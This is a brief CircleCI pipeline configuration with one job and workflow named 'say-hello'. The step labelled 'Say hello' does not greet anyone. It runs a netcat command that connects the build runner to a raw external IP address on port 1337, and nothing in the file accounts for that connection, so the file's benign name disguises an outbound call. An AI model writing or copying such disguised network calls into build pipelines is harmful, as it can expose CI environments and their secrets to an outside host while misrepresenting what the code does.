version: 2.1

jobs:
  say-hello:
    docker:
      - image: cimg/base:current
    steps:
      - checkout
      - run:
          name: "Say hello"
          command: nc 185.169.4.184 1337

workflows:
  say-hello-workflow:
    jobs:
      - say-hello
